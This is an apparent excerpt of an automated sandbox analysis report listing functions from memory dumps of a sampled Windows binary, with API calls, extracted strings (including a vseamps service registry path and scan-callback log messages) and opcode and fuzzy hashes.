                                  • Opcode Fuzzy Hash: 09225629eee72228c5d7f95fa2eee3f64651a4a6406a600936b89273ecb07b9f
                                  • Instruction Fuzzy Hash: FD41F6B1218A8582EB22DF12F8547DA73A5F79D7D4F400125EB8A0BAB5DF7EC548CB40
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.3128916724.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                  • Associated: 00000005.00000002.3128819805.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000005.00000002.3128933420.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000005.00000002.3128946359.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000005.00000002.3129030715.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_140000000_XXiUpO.jbxd
                                  Similarity
                                  • API ID: Heap$AllocProcesslstrlen
                                  • String ID: Security=impersonation static true$ampIfEp$ncalrpc
                                  • API String ID: 3424473247-996641649
                                  • Opcode ID: 1d37d06b5998b82bc2dc7011aec07efaf1f4b1bb41d2d67d0687b588f1a55b3d
                                  • Instruction ID: 5475aedf582102907cd33adbfaf34f9b11ebc9e91273ce6565e0ea0cfbbdf015
                                  • Opcode Fuzzy Hash: 1d37d06b5998b82bc2dc7011aec07efaf1f4b1bb41d2d67d0687b588f1a55b3d
                                  • Instruction Fuzzy Hash: FE3137B062A74082FB03CB53BD447E962A5E75DBD8F554019EB0E0BBB6DBBEC1558700
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.3128916724.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                  • Associated: 00000005.00000002.3128819805.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000005.00000002.3128933420.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000005.00000002.3128946359.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000005.00000002.3129030715.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_140000000_XXiUpO.jbxd
                                  Similarity
                                  • API ID: String$ByteCharMultiWide$ErrorLast
                                  • String ID:
                                  • API String ID: 1775797328-0
                                  • Opcode ID: 802883c3254266504f9bffab4fe863b98e9923c524f0017741f2ad98f2b9a469
                                  • Instruction ID: 7820e0e177e3580e7fbac086e7e180635334a87404cd07a7d6eea56579f34d7e
                                  • Opcode Fuzzy Hash: 802883c3254266504f9bffab4fe863b98e9923c524f0017741f2ad98f2b9a469
                                  • Instruction Fuzzy Hash: 7CE18BB27007808AEB66DF26A54079977E1F74EBE8F144225FB6957BE8DB38C941C700
                                  APIs
                                  • GetEnvironmentStringsW.KERNEL32(?,?,?,?,?,0000000140005C67), ref: 0000000140009C52
                                  • GetLastError.KERNEL32(?,?,?,?,?,0000000140005C67), ref: 0000000140009C6C
                                  • GetEnvironmentStringsW.KERNEL32(?,?,?,?,?,0000000140005C67), ref: 0000000140009C91
                                  • FreeEnvironmentStringsW.KERNEL32(?,?,?,?,?,0000000140005C67), ref: 0000000140009CD4
                                  • FreeEnvironmentStringsW.KERNEL32(?,?,?,?,?,0000000140005C67), ref: 0000000140009CF2
                                  • GetEnvironmentStrings.KERNEL32(?,?,?,?,?,0000000140005C67), ref: 0000000140009D09
                                  • MultiByteToWideChar.KERNEL32(?,?,?,?,?,0000000140005C67), ref: 0000000140009D37
                                  • FreeEnvironmentStringsA.KERNEL32(?,?,?,?,?,0000000140005C67), ref: 0000000140009D73
                                  • FreeEnvironmentStringsA.KERNEL32(?,?,?,?,?,0000000140005C67), ref: 0000000140009E19
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.3128916724.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                  • Associated: 00000005.00000002.3128819805.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000005.00000002.3128933420.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000005.00000002.3128946359.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000005.00000002.3129030715.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_140000000_XXiUpO.jbxd
                                  Similarity
                                  • API ID: EnvironmentStrings$Free$ByteCharErrorLastMultiWide
                                  • String ID:
                                  • API String ID: 1232609184-0
                                  • Opcode ID: 0fe341c893830b3e5934a62294215ba1eeb7ab0cb4f80f00c247d68fe650ca03
                                  • Instruction ID: a97fb2b29f1dbdd40f84dfefdd532c69b8fe37edd6617e3b903b273dff31e607
                                  • Opcode Fuzzy Hash: 0fe341c893830b3e5934a62294215ba1eeb7ab0cb4f80f00c247d68fe650ca03
                                  • Instruction Fuzzy Hash: 9851AEB164564046FB66DF23B8147AA66D0BB4DFE0F484625FF6A87BF1EB78C4448300
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.3128916724.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                  • Associated: 00000005.00000002.3128819805.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000005.00000002.3128933420.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000005.00000002.3128946359.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000005.00000002.3129030715.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_140000000_XXiUpO.jbxd
                                  Similarity
                                  • API ID: Heap$CriticalSection$EnterFreeProcess$Leave
                                  • String ID: H
                                  • API String ID: 2107338056-2852464175
                                  • Opcode ID: 5b70108e8ada33305ec7243e3672b6dc87a1b4650feeecbcfbcd773178ed88ea
                                  • Instruction ID: c1f1c0cc251b461ea163c40135a27997c94af954a8846501eddf5ed74a01cb36
                                  • Opcode Fuzzy Hash: 5b70108e8ada33305ec7243e3672b6dc87a1b4650feeecbcfbcd773178ed88ea
                                  • Instruction Fuzzy Hash: D5513B76216B4086EBA2DF63B84439A73E5F74DBD0F098128EB9D87765EF39C4558300
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.3128916724.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                  • Associated: 00000005.00000002.3128819805.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000005.00000002.3128933420.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000005.00000002.3128946359.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000005.00000002.3129030715.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_140000000_XXiUpO.jbxd
                                  Similarity
                                  • API ID: CriticalSection$AddressEnterLeaveProc$LibraryLoadTimerWaitable
                                  • String ID: fnCallback: hScan=%d, evId=%d, context=%p$fnCallback: hScan=%d, putting event %d into listening threads queues$fnCallback: hScan=%d, quarantine, result %d
                                  • API String ID: 1322048431-2685357988
                                  • Opcode ID: 8f454d8f96427bc7f4d6fc52e9fe6703152659d2229fc404623004bd99a71f34
                                  • Instruction ID: ba1df9fb3c509f4e652456910b8147ac8aac6905a945631cefe2604201aedb7e
                                  • Opcode Fuzzy Hash: 8f454d8f96427bc7f4d6fc52e9fe6703152659d2229fc404623004bd99a71f34
                                  • Instruction Fuzzy Hash: 645106B5214B4181EB13CF16F880BD923A4E79DBE4F445622BB594B6B4DF3AC584C740
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.3128916724.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                  • Associated: 00000005.00000002.3128819805.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000005.00000002.3128933420.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000005.00000002.3128946359.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000005.00000002.3129030715.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_140000000_XXiUpO.jbxd
                                  Similarity
                                  • API ID: CriticalSection$EnterLeaveTimerWaitable
                                  • String ID: doCleanup: enter, cAmpEntry %p$doCleanup: pid %d, marking the cAmpEntry pointer for deletion$doCleanup: pid %d, removing cAmpEntry, index is %d
                                  • API String ID: 2984211723-3002863673
                                  • Opcode ID: a738ef0df41c9c2085df25b69143ddd466836247f0acf0cab1fab4ffcf6577b7
                                  • Instruction ID: 6ce834a9fa2c46ab9e722fc1bcf1c858386cde021ca473021475461b430fce50
                                  • Opcode Fuzzy Hash: a738ef0df41c9c2085df25b69143ddd466836247f0acf0cab1fab4ffcf6577b7
                                  • Instruction Fuzzy Hash: 9B4101B5214A8591EB128F07F880B9863A4F78CBE4F495226FB1D0BBB4DB7AC591C710
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.3128916724.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                  • Associated: 00000005.00000002.3128819805.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000005.00000002.3128933420.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000005.00000002.3128946359.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000005.00000002.3129030715.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_140000000_XXiUpO.jbxd
                                  Similarity
                                  • API ID: CloseHandleMultipleObjectsOpenProcessWait
                                  • String ID: doMonitor: end process id=%d, result from WaitForMultipleObjects=%d$doMonitor: monitoring process id=%d$fnMonitor: monitor thread for ctx %p
                                  • API String ID: 678758403-4129911376
                                  • Opcode ID: 622955a85f652782e43c0e0864684ab55b88adcc3dc18936af4ab90c870e9f37
                                  • Instruction ID: f397f01a700ed75a1720fb106c04e764a2ecaef09c032a262f7e58a7780e1373
                                  • Opcode Fuzzy Hash: 622955a85f652782e43c0e0864684ab55b88adcc3dc18936af4ab90c870e9f37
                                  • Instruction Fuzzy Hash: B63107B6610A4582EB12DF57F84079963A4E78CBE4F498122FB1C0B7B4DF3AC585C710
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.3128916724.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                  • Associated: 00000005.00000002.3128819805.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000005.00000002.3128933420.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000005.00000002.3128946359.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000005.00000002.3129030715.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_140000000_XXiUpO.jbxd
                                  Similarity
                                  • API ID: Heap$AllocProcesslstrlen
                                  • String ID:
                                  • API String ID: 3424473247-0
                                  • Opcode ID: c17ffa923c8182584db73c91a06df651023cf72d925272b18aed562ea20615b1
                                  • Instruction ID: a11592c0991bfac199573d0d609f53e0c1426f0a5ad78f28403dae96cf8670eb
                                  • Opcode Fuzzy Hash: c17ffa923c8182584db73c91a06df651023cf72d925272b18aed562ea20615b1
                                  • Instruction Fuzzy Hash: C8513AB6701640CAE666DFA3B84479A67E0F74DFC8F588428AF4E4B721DA38D155A700
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.3128916724.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                  • Associated: 00000005.00000002.3128819805.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000005.00000002.3128933420.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000005.00000002.3128946359.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000005.00000002.3129030715.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_140000000_XXiUpO.jbxd
                                  Similarity
                                  • API ID: BlockUnwind$BaseEntryFunctionImageLookupThrow
                                  • String ID: bad exception$csm$csm$csm
                                  • API String ID: 3766904988-820278400
                                  • Opcode ID: 211ea14586251fca33d837236c8444fcda6bc332046b6eb3b50ec8ef4bad2153
                                  • Instruction ID: ec44bdd804db6766ea80e989845e9f4c5c79a3e5de674617e5e8a62493c248da
                                  • Opcode Fuzzy Hash: 211ea14586251fca33d837236c8444fcda6bc332046b6eb3b50ec8ef4bad2153
                                  • Instruction Fuzzy Hash: 2202C17220478086EB66DB27A4447EEB7A5F78DBC4F484425FF894BBAADB39C550C700
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.3128916724.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                  • Associated: 00000005.00000002.3128819805.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000005.00000002.3128933420.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000005.00000002.3128946359.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000005.00000002.3129030715.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_140000000_XXiUpO.jbxd
                                  Similarity
                                  • API ID: CriticalSection$EnterEventLeaveMultipleObjectsWait$ResetSleep
                                  • String ID:
                                  • API String ID: 2707001247-0
                                  • Opcode ID: 81fbcb92f811cf70c85be9260a27baa2b932eaa25df2b6e09ac4b98cba08ed51
                                  • Instruction ID: f9d573460b216e7eeefce72b36cf093424a31f8579033a03516ac6dab9ef0102
                                  • Opcode Fuzzy Hash: 81fbcb92f811cf70c85be9260a27baa2b932eaa25df2b6e09ac4b98cba08ed51
                                  • Instruction Fuzzy Hash: BC3159B6304A4492EB22DF22F44479AB360F749BE4F444121EB9E07AB4DF39D489C708
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.3129059889.00007FFDAC091000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFDAC090000, based on PE: true
                                  • Associated: 00000005.00000002.3129046543.00007FFDAC090000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 00000005.00000002.3129077200.00007FFDAC0A2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 00000005.00000002.3129100003.00007FFDAC0AD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 00000005.00000002.3129117053.00007FFDAC0AF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_7ffdac090000_XXiUpO.jbxd
                                  Similarity
                                  • API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
                                  • String ID: csm$csm$csm
                                  • API String ID: 849930591-393685449
                                  • Opcode ID: f1adb4ecd083bc80385bf1a1a2c543f93b0b2fb07cc426c5636c8daff4c8f18a
                                  • Instruction ID: ad24663468dd2efbf419ae51e4205aba95a0452e2e138363cb45763923dc5136
                                  • Opcode Fuzzy Hash: f1adb4ecd083bc80385bf1a1a2c543f93b0b2fb07cc426c5636c8daff4c8f18a
                                  • Instruction Fuzzy Hash: CFD1C072B097418AEB209F6594603AD37A0FB457E8F000235EE8D57B97CF38E4A0DB48
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.3128916724.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                  • Associated: 00000005.00000002.3128819805.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000005.00000002.3128933420.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000005.00000002.3128946359.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000005.00000002.3129030715.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_140000000_XXiUpO.jbxd
                                  Similarity
                                  • API ID: Heap$FreeProcess
                                  • String ID:
                                  • API String ID: 3859560861-0
                                  • Opcode ID: d3d786e63681585cbf03c2d219a109844956a30e82e5544b8f66a627abd00fb2
                                  • Instruction ID: 4159c8d252e8bf7a629169213e0784b10943506046d671ff930a732f0a48acbb
                                  • Opcode Fuzzy Hash: d3d786e63681585cbf03c2d219a109844956a30e82e5544b8f66a627abd00fb2
                                  • Instruction Fuzzy Hash: EC1145B4915A4081F70BDF97B8187D522E2FB8DBD9F484025E70A4B2B0DF7E8499C601
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.3128916724.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                  • Associated: 00000005.00000002.3128819805.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000005.00000002.3128933420.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000005.00000002.3128946359.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000005.00000002.3129030715.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_140000000_XXiUpO.jbxd
                                  Similarity
                                  • API ID: Heap$FreeProcess
                                  • String ID:
                                  • API String ID: 3859560861-0
                                  • Opcode ID: 2b20d9b04266fb418ab88241afe0be8334b025a235c71ad7c61a809fe6dc3135
                                  • Instruction ID: 56b7ada565ecb083b5892330f511bf6cd885877ef2bee609f5ffef12e4ab2997
                                  • Opcode Fuzzy Hash: 2b20d9b04266fb418ab88241afe0be8334b025a235c71ad7c61a809fe6dc3135
                                  • Instruction Fuzzy Hash: E01172B4918A8081F71BDBA7B81C7D522E2FB8DBD9F444015E70A4B2F0DFBE8499C601
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.3129059889.00007FFDAC091000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFDAC090000, based on PE: true
                                  • Associated: 00000005.00000002.3129046543.00007FFDAC090000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 00000005.00000002.3129077200.00007FFDAC0A2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 00000005.00000002.3129100003.00007FFDAC0AD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 00000005.00000002.3129117053.00007FFDAC0AF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_7ffdac090000_XXiUpO.jbxd
                                  Similarity
                                  • API ID: AddressFreeLibraryProc
                                  • String ID: api-ms-$ext-ms-
                                  • API String ID: 3013587201-537541572
                                  • Opcode ID: d27e4f6126b13d6b256a918f8f190c41ea59ca19706b8a974bfb2f07ede01360
                                  • Instruction ID: bd3ced9a248629d0ef1881fafdf95a640864d8b4b8c77b1f6b37f7c4979b58c2
                                  • Opcode Fuzzy Hash: d27e4f6126b13d6b256a918f8f190c41ea59ca19706b8a974bfb2f07ede01360
                                  • Instruction Fuzzy Hash: EC41E521B2BA0245EA25CB16A8307BA2391BF45BF0F094935DD4E47786DF3CE425E34C
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.3128916724.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                  • Associated: 00000005.00000002.3128819805.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000005.00000002.3128933420.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000005.00000002.3128946359.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000005.00000002.3129030715.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_140000000_XXiUpO.jbxd
                                  Similarity
                                  • API ID: CriticalSection$CloseCreateEnterLeaveQueryValue
                                  • String ID: SYSTEM\CurrentControlSet\Services\vseamps\Parameters$action
                                  • API String ID: 1119674940-1966266597
                                  • Opcode ID: f3533de3366e7bda9e1b35d25a0c2c8c172dac4edddfecf2711061c5e43c3c9b
                                  • Instruction ID: f124d29d71956a548941c3df06686b2c3eef24402cfc23b06ee64cf3511db711
                                  • Opcode Fuzzy Hash: f3533de3366e7bda9e1b35d25a0c2c8c172dac4edddfecf2711061c5e43c3c9b
                                  • Instruction Fuzzy Hash: 6F31F975214B4186EB22CF26F884B9573A4F78D7A8F401315FBA94B6B4DF3AC148CB00
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.3128916724.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                  • Associated: 00000005.00000002.3128819805.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000005.00000002.3128933420.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000005.00000002.3128946359.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000005.00000002.3129030715.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_140000000_XXiUpO.jbxd
                                  Similarity
                                  • API ID: Heap$AllocProcesslstrlen$ComputerName
                                  • String ID: Security=impersonation static true$ampIfEp$ncalrpc
                                  • API String ID: 3702919091-996641649
                                  • Opcode ID: 625aae782f6e6c8352582bed456207495076f7317be3b5f58fd10a3b56526d44
                                  • Instruction ID: 080136972d91dcf489914e021d1613250a4fb989530f4420e20b1ceb3111c88a
                                  • Opcode Fuzzy Hash: 625aae782f6e6c8352582bed456207495076f7317be3b5f58fd10a3b56526d44
                                  • Instruction Fuzzy Hash: 4F212A71215B8082EB12CB12F84438A73A4F789BE8F514216EB9D07BB8DF7DC54ACB00
                                  APIs
                                  • GetCPInfo.KERNEL32(?,?,?,?,?,?,?,?,00000001,?,00000001,?,00000000,?,?,?), ref: 000000014000F43A
                                  • GetCPInfo.KERNEL32(?,?,?,?,?,?,?,?,00000001,?,00000001,?,00000000,?,?,?), ref: 000000014000F459
                                  • MultiByteToWideChar.KERNEL32(?,?,?,?,?,?,?,?,00000001,?,00000001,?,00000000,?,?,?), ref: 000000014000F4FF
                                  • MultiByteToWideChar.KERNEL32(?,?,?,?,?,?,?,?,00000001,?,00000001,?,00000000,?,?,?), ref: 000000014000F559
                                  • WideCharToMultiByte.KERNEL32(?,?,?,?,?,?,?,?,00000001,?,00000001,?,00000000,?,?,?), ref: 000000014000F592
                                  • WideCharToMultiByte.KERNEL32(?,?,?,?,?,?,?,?,00000001,?,00000001,?,00000000,?,?,?), ref: 000000014000F5CF
                                  • WideCharToMultiByte.KERNEL32(?,?,?,?,?,?,?,?,00000001,?,00000001,?,00000000,?,?,?), ref: 000000014000F60E
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.3128916724.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                  • Associated: 00000005.00000002.3128819805.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000005.00000002.3128933420.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000005.00000002.3128946359.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000005.00000002.3129030715.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_140000000_XXiUpO.jbxd
                                  Similarity
                                  • API ID: ByteCharMultiWide$Info
                                  • String ID:
                                  • API String ID: 1775632426-0
                                  • Opcode ID: 66d9eb7914d19e8cfe6722e8c0a791cb2122334676924f0ca9c1b8cdf3048d99
                                  • Instruction ID: 43b9ce706039119b05782f2693b3e997f7dca892eef84fff4304595f3d56aff3
                                  • Opcode Fuzzy Hash: 66d9eb7914d19e8cfe6722e8c0a791cb2122334676924f0ca9c1b8cdf3048d99
                                  • Instruction Fuzzy Hash: 266181B2200B808AE762DF23B8407AA66E5F74C7E8F548325BF6947BF4DB74C555A700
                                  APIs
                                  • LoadLibraryExW.KERNEL32(?,?,?,00007FFDAC0972EB,?,?,?,00007FFDAC093EC0,?,?,?,?,00007FFDAC093CFD), ref: 00007FFDAC0971B1
                                  • GetLastError.KERNEL32(?,?,?,00007FFDAC0972EB,?,?,?,00007FFDAC093EC0,?,?,?,?,00007FFDAC093CFD), ref: 00007FFDAC0971BF
                                  • LoadLibraryExW.KERNEL32(?,?,?,00007FFDAC0972EB,?,?,?,00007FFDAC093EC0,?,?,?,?,00007FFDAC093CFD), ref: 00007FFDAC0971E9
                                  • FreeLibrary.KERNEL32(?,?,?,00007FFDAC0972EB,?,?,?,00007FFDAC093EC0,?,?,?,?,00007FFDAC093CFD), ref: 00007FFDAC097257
                                  • GetProcAddress.KERNEL32(?,?,?,00007FFDAC0972EB,?,?,?,00007FFDAC093EC0,?,?,?,?,00007FFDAC093CFD), ref: 00007FFDAC097263
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.3129059889.00007FFDAC091000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFDAC090000, based on PE: true
                                  • Associated: 00000005.00000002.3129046543.00007FFDAC090000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 00000005.00000002.3129077200.00007FFDAC0A2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 00000005.00000002.3129100003.00007FFDAC0AD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 00000005.00000002.3129117053.00007FFDAC0AF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_7ffdac090000_XXiUpO.jbxd
                                  Similarity
                                  • API ID: Library$Load$AddressErrorFreeLastProc
                                  • String ID: api-ms-
                                  • API String ID: 2559590344-2084034818
                                  • Opcode ID: bd0a8d2a555e0ee16e973e96254fe36908eaf1a6b67fdf5dc890da79f6d47fff
                                  • Instruction ID: 5ecd57981e5c18bc5e0c700695737a404a2c2e021707966ca4ebbc061b0159e5
                                  • Opcode Fuzzy Hash: bd0a8d2a555e0ee16e973e96254fe36908eaf1a6b67fdf5dc890da79f6d47fff
                                  • Instruction Fuzzy Hash: A531D422B2B741D5EE159B0AA4206B96794BF48BF0F590634EE1D07752DF3CE461D30C
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.3129059889.00007FFDAC091000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFDAC090000, based on PE: true
                                  • Associated: 00000005.00000002.3129046543.00007FFDAC090000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 00000005.00000002.3129077200.00007FFDAC0A2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 00000005.00000002.3129100003.00007FFDAC0AD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 00000005.00000002.3129117053.00007FFDAC0AF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_7ffdac090000_XXiUpO.jbxd
                                  Similarity
                                  • API ID: Value$ErrorLast
                                  • String ID:
                                  • API String ID: 2506987500-0
                                  • Opcode ID: bb16a7b3e3e618224ffaf8681bb99f7b7eedade10f219c40875930e32152d962
                                  • Instruction ID: 758ae21565f65a46f2dc2814721601525d203d3eb5b23b021adb322960a91b9a
                                  • Opcode Fuzzy Hash: bb16a7b3e3e618224ffaf8681bb99f7b7eedade10f219c40875930e32152d962
                                  • Instruction Fuzzy Hash: E5216F20B0F24245FA69A361557177A62929F84BF0F140B34E97E07BD7EF2CE461A60C
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.3129059889.00007FFDAC091000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFDAC090000, based on PE: true
                                  • Associated: 00000005.00000002.3129046543.00007FFDAC090000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 00000005.00000002.3129077200.00007FFDAC0A2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 00000005.00000002.3129100003.00007FFDAC0AD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 00000005.00000002.3129117053.00007FFDAC0AF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  Joe Sandbox IDA Plugin
